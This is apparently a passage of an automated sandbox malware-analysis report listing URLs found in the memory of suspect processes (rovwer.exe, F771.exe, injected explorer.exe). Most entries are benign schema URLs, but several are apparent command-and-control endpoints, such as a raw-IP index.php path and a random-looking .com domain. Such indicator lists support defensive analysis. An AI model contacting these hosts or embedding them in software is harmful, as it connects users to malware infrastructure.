                      Source: rovwer.exe, 0000000E.00000002.801547288.0000000000AD2000.00000004.00000020.00020000.00000000.sdmp, rovwer.exe, 0000000E.00000002.817014451.000000000353D000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://193.56.146.174/g84kvj4jck/index.php?scr=1
                      Source: rovwer.exe, 0000000E.00000002.802911113.0000000000ADF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.56.146.174/g84kvj4jck/index.phpVideG
                      Source: rovwer.exe, 0000000E.00000002.801547288.0000000000AD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://19393.56.146.174/g84kvj4jck/index.phpOI/
                      Source: B4A7.exe, 0000000D.00000002.563359842.0000000000866000.00000040.00000800.00020000.00000000.sdmpString found in binary or memory: http://2w3ke1f81kujb1ErHJ396kFeJh2wGw.kGPoaj9K4sgjD4aiTghsRtuXhqvbvjv8V7st4eO9BqNG3yXvEhExEI86ToM3BF
                      Source: RegSvcs.exe, 0000002F.00000002.570733528.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://65.21.213.208:3000inconsistent
                      Source: RegSvcs.exe, 0000002F.00000002.636205711.000002ADC0019000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
                      Source: F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
                      Source: F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
                      Source: F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
                      Source: F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                      Source: F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
                      Source: F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
                      Source: F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
                      Source: F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
                      Source: F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
                      Source: F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
                      Source: F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
                      Source: F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
                      Source: F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
                      Source: F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
                      Source: F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
                      Source: F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
                      Source: F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
                      Source: explorer.exe, 00000027.00000002.772302955.00000000008F1000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://go.mail.ru/search
                      Source: explorer.exe, 00000027.00000002.772302955.00000000008F1000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://nova.rambler.ru/search
                      Source: explorer.exe, 00000021.00000000.456333193.0000000000540000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000022.00000000.459238945.0000000000540000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000022.00000002.777469766.00000000009D0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000023.00000000.462429473.0000000000120000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000025.00000000.465274597.0000000000140000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000025.00000002.771553703.0000000000580000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000026.00000002.784028840.0000000003497000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000027.00000000.474180010.0000000000900000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000029.00000000.476884087.0000000000A70000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 0000002A.00000000.479766782.0000000000510000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 0000002A.00000002.774664749.00000000009D0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002B.00000000.482523463.0000000000650000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 0000002B.00000002.778517394.00000000009B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://o36fafs3sn6xou.com/
                      Source: explorer.exe, 00000021.00000000.456333193.0000000000540000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000022.00000000.459238945.0000000000540000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000022.00000002.777469766.00000000009D0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000023.00000000.462429473.0000000000120000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000025.00000000.465274597.0000000000140000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000025.00000002.771553703.0000000000580000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000026.00000002.784028840.0000000003497000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000027.00000000.474180010.0000000000900000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000029.00000000.476884087.0000000000A70000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 0000002A.00000000.479766782.0000000000510000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 0000002A.00000002.774664749.00000000009D0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002B.00000000.482523463.0000000000650000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 0000002B.00000002.778517394.00000000009B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://o36fafs3sn6xou.com/Mozilla/5.0
                      Source: B4A7.exe.1.drString found in binary or memory: http://s.symcb.com/universal-root.crl0
                      Source: B4A7.exe.1.drString found in binary or memory: http://s.symcd.com06
                      Source: F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
                      Source: F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
                      Source: F771.exe, 00000020.00000002.852334346.0000000002A61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                      Source: F771.exe, 00000020.00000002.852334346.0000000002A61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                      Source: F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
                      Source: F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
                      Source: F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
                      Source: F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
                      Source: F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
                      Source: F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
                      Source: F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
                      Source: F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
                      Source: F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
                      Source: F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
                      Source: F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
                      Source: F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
                      Source: F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
                      Source: F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
                      Source: F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
                      Source: F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
                      Source: F771.exe, 00000020.00000002.852334346.0000000002A61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                      Source: F771.exe, 00000020.00000002.852334346.0000000002A61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
                      Source: F771.exe, 00000020.00000002.852334346.0000000002A61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                      Source: F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
                      Source: F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
                      Source: F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
                      Source: F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
                      Source: F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
                      Source: F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
                      Source: F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
                      Source: F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
                      Source: F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
                      Source: F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
                      Source: F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
                      Source: F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
                      Source: F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
                      Source: F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
                      Source: F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
                      Source: F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
                      Source: F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
                      Source: F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
                      Source: F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
                      Source: F771.exe, 00000020.00000002.852334346.0000000002A61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
                      Source: F771.exe, 00000020.00000002.852334346.0000000002A61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
                      Source: F771.exe, 00000020.00000002.852334346.0000000002A61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
                      Source: F771.exe, 00000020.00000002.852334346.0000000002A61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
                      Source: F771.exe, 00000020.00000002.852334346.0000000002A61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
                      Source: F771.exe, 00000020.00000002.852334346.0000000002A61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
                      Source: F771.exe, 00000020.00000002.852334346.0000000002A61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm8Dh
                      Source: F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
                      Source: F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
                      Source: F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
                      Source: F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
                      Source: F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                      Source: F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
                      Source: F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
                      Source: F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
                      Source: F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
                      Source: F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
                      Source: F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
                      Source: F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
                      Source: F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
                      Source: F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
                      Source: F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
                      Source: F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
                      Source: F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
                      Source: F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
                      Source: F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
                      Source: F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
                      Source: F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
                      Source: F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
                      Source: F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
                      Source: F771.exe, 00000020.00000002.852334346.0000000002A61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
                      Source: F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: F771.exe, 00000020.00000002.852334346.0000000002A61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
                      Source: F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
                      Source: explorer.exe, 00000027.00000002.772302955.00000000008F1000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://search.aol.com/aol/search
                      Source: explorer.exe, 00000027.00000002.772302955.00000000008F1000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://search.yahoo.com/search
                      Source: F771.exe, 00000020.00000002.852334346.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/
                      Source: F771.exe, 00000020.00000002.852334346.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, F771.exe, 00000020.00000002.853313389.0000000002AF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1
                      Source: F771.exe, 00000020.00000002.852334346.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, F771.exe, 00000020.00000002.853313389.0000000002AF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10
                      Source: F771.exe, 00000020.00000002.852334346.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmp, F771.exe, 00000020.00000002.853313389.0000000002AF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10Response
                      Source: F771.exe, 00000020.00000002.852334346.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, F771.exe, 00000020.00000002.853313389.0000000002AF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11
                      Source: F771.exe, 00000020.00000002.852334346.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmp, F771.exe, 00000020.00000002.853313389.0000000002AF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11Response
                      Source: F771.exe, 00000020.00000002.852334346.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, F771.exe, 00000020.00000002.853313389.0000000002AF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12
                      Source: F771.exe, 00000020.00000002.852334346.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, F771.exe, 00000020.00000002.853313389.0000000002AF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12Response
                      Source: F771.exe, 00000020.00000002.852334346.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, F771.exe, 00000020.00000002.853313389.0000000002AF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13
                      Source: F771.exe, 00000020.00000002.852334346.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, F771.exe, 00000020.00000002.853313389.0000000002AF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13Response
                      Source: F771.exe, 00000020.00000002.852334346.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, F771.exe, 00000020.00000002.853313389.0000000002AF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14
                      Source: F771.exe, 00000020.00000002.852334346.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, F771.exe, 00000020.00000002.853313389.0000000002AF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14Response
                      Source: F771.exe, 00000020.00000002.852334346.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, F771.exe, 00000020.00000002.853313389.0000000002AF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15
                      Source: F771.exe, 00000020.00000002.852334346.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, F771.exe, 00000020.00000002.853313389.0000000002AF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15Response
                      Source: F771.exe, 00000020.00000002.852334346.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, F771.exe, 00000020.00000002.853313389.0000000002AF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16
                      Source: F771.exe, 00000020.00000002.852334346.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, F771.exe, 00000020.00000002.853313389.0000000002AF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16Response
                      Source: F771.exe, 00000020.00000002.852334346.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, F771.exe, 00000020.00000002.853313389.0000000002AF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17
                      Source: F771.exe, 00000020.00000002.852334346.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, F771.exe, 00000020.00000002.853313389.0000000002AF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17Response
                      Source: F771.exe, 00000020.00000002.852334346.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, F771.exe, 00000020.00000002.853313389.0000000002AF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18
                      Source: F771.exe, 00000020.00000002.852334346.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, F771.exe, 00000020.00000002.853313389.0000000002AF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18Response
                      Source: F771.exe, 00000020.00000002.852334346.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, F771.exe, 00000020.00000002.853313389.0000000002AF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19
                      Source: F771.exe, 00000020.00000002.853313389.0000000002AF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19Response
                      Source: F771.exe, 00000020.00000002.852334346.0000000002A61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19ResponseX%
                      Source: F771.exe, 00000020.00000002.852334346.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1Response
                      Source: F771.exe, 00000020.00000002.853313389.0000000002AF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1ResponseinX%
                      Source: F771.exe, 00000020.00000002.852334346.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, F771.exe, 00000020.00000002.853313389.0000000002AF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2
                      Source: F771.exe, 00000020.00000002.852334346.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, F771.exe, 00000020.00000002.853313389.0000000002AF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20
